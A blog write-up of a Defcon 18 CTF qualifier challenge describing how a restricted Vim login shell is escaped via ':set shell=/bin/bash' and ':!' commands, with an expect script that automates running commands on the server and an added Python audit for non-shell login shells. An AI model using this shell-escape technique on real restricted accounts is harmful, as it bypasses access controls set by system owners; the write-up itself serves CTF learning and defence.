Thursday, May 27, 2010

Defcon 18 CTF quals writeup - Trivial 200

Trivial 200 was an evil blind VIM terminal you had to escape from.

Description: sheep@pwn21.ddtek.biz:6000 sheep go baaAaaA

One could simply SSH to the server with:
ssh -p 6000 sheep@pwn21.ddtek.biz # and use password baaAaaA
However, it appeared that the server was overloaded and most of the time SSH did not work. The solution is to connect to SSH continuously until it works with some shell scripting:
while true; do
  ssh -p6000 sheep@pwn21.ddtek.biz
done
Once connected, you get a black screen with nothing on it, but you quickly discover you are inside the VIM text editor.

To deal with the black screen that displays nothing, you could either:
  • under Windows with PuTTY, uncheck the Window/Colours options
  • select the text and copy/paste it elsewhere; the content is there, just invisible
  • write some expect to automate the SSH connection and the sending of commands, so that the output of SSH can be piped through other tools

A few useful VIM commands:
:q! => quit
:o => open a file
:!<command> => run command *in default shell*

We tried to list files with:
:!ls
but it did not work. So we opened /etc/passwd with:
:o /etc/passwd
and discovered that the default shell of the sheep user was /usr/bin/vim: since :! runs the command through the shell option, which Vim initialises from $SHELL, every :!command was just spawning another vim. Simply change it with:
:set shell=/bin/bash

Then we were able to list files:
:!ls
and view the key file:
-rw-r-----. 1 root sheepy 13 May 22 00:01 key
Just open it with:
:o key
and you get the key: SHis4pansies.
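The root cause here is an account whose login shell is an editor, not a shell, and an editor with a built-in command runner is no restriction at all. As an added example (not part of the writeup), here is a small Python audit that flags passwd entries whose login shell is not listed in /etc/shells, run over constructed sample data that mirrors the sheep account:

```python
"""Audit /etc/passwd-style data for accounts whose login shell is not a
real shell.  Added example; the sample data below is constructed."""

# Constructed sample /etc/passwd content (hypothetical accounts).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sheep:x:1001:1001:CTF sheep:/home/sheep:/usr/bin/vim
alice:x:1002:1002::/home/alice:/bin/bash
bob:x:1003:1003::/home/bob:/usr/bin/python3
"""

# Constructed sample /etc/shells content.
SAMPLE_SHELLS = """/bin/sh
/bin/bash
/usr/sbin/nologin
/bin/false
"""

# Deliberate lock-out "shells": not interactive, so not a finding.
NOLOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/true"}


def parse_passwd(text):
    """Yield (user, uid, shell) for each well-formed passwd(5) line.
    An empty shell field means /bin/sh, as passwd(5) specifies."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip rather than guess
        yield fields[0], int(fields[2]), fields[6] or "/bin/sh"


def parse_shells(text):
    """Return the set of shells listed in an /etc/shells-style file."""
    return {l.strip() for l in text.splitlines()
            if l.strip() and not l.startswith("#")}


def audit(passwd_text, shells_text):
    """Return {user: reason} for accounts whose login shell is neither a
    known lock-out nor listed in /etc/shells (e.g. vim, as on this box)."""
    valid = parse_shells(shells_text)
    findings = {}
    for user, _uid, shell in parse_passwd(passwd_text):
        if shell in NOLOGIN or shell in valid:
            continue
        findings[user] = "shell %s not listed in /etc/shells" % shell
    return findings
```

On a real host, feed it the contents of /etc/passwd and /etc/shells; anything it flags deserves a look, because the program in that field decides what the user can run.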

At the same time, I was doing some expect & shell scripting to get the key. Expect comes in very handy when you want to automate things or when you need the output of an interactive program such as ssh. Let me show you this solution as a small introduction to expect.

The expect script:
$ cat ssh-cmd.expect
#!/usr/bin/expect -f
# the command to run is passed as the first (and only) argument
set cmd [lindex $argv 0]
spawn ssh -p 6000 sheep@pwn21.ddtek.biz
# wait for the password prompt, then answer it
expect "*?assword:*"
send -- "baaAaaA\r"
# give vim a moment to start before sending keystrokes
sleep 1
# point vim's shell option at a real shell, run the command, quit
send -- ":set shell=/bin/sh\r"
send -- ":!$cmd\r"
send -- ":q!\r"
expect eof

The shell script that runs expect and filters the output for us:
$ cat ssh-cmd.sh
#!/bin/sh
# drop the lines of terminal escape codes (they start with '[' once strings has stripped the ESC byte)
./ssh-cmd.expect "$*" | strings | grep -v '^\['

List files:
$ ./ssh-cmd.sh ls -l
spawn ssh -p 6000 sheep@pwn21.ddtek.biz
sheep@pwn21.ddtek.biz's password:
Last login: Sat May 22 05:34:03 2010 from x
total 4
-rw-r-----. 1 root sheepy 13 May 22 00:01 key
Press ENTER or type command to continue
Connection to pwn21.ddtek.biz closed.

Cat the key:
$ ./ssh-cmd.sh cat key
spawn ssh -p 6000 sheep@pwn21.ddtek.biz
sheep@pwn21.ddtek.biz's password:
Last login: Sat May 22 05:34:18 2010 from x
SHis4pansies
Press ENTER or type command to continue
Connection to pwn21.ddtek.biz closed.

Done!

1 comment:

  1. Very interesting, the little extra bit about expect, thank you!
